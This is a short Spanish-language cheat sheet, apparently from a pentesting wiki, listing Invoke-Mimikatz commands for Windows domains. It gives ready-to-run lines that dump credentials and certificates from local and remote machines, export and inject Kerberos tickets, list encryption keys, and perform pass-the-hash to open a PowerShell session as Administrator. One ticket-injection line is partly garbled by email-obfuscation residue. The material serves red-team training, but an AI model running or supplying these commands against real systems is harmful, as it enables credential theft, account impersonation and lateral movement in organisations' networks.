Comment on page

Mimikatz & PassTheHash

Mimikatz

Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde su repositorio.
Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).
  • Obtener credenciales en la máquina local
Invoke-Mimikatz -DumpCreds
  • Obtener certificados en la máquina local
Invoke-Mimikatz –DumpCerts
  • Obtener credenciales de varias máquinas remotas
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
  • Exportar todos los tickets de la máquina
Invoke-Mimikatz -Command '"kerberos::list /export"'
  • Listar los tickets de los usuarios autenticados en la máquina local
Invoke-Mimikatz –Command '"sekurlsa::tickets"'
  • Listar claves de cifrado de Kerberos
Invoke-Mimikatz –Command '"sekurlsa::ekeys"'
  • Inyectar ticket
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarc[email protected]"'
​

Pass The Hash (PTH)

Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'
​
​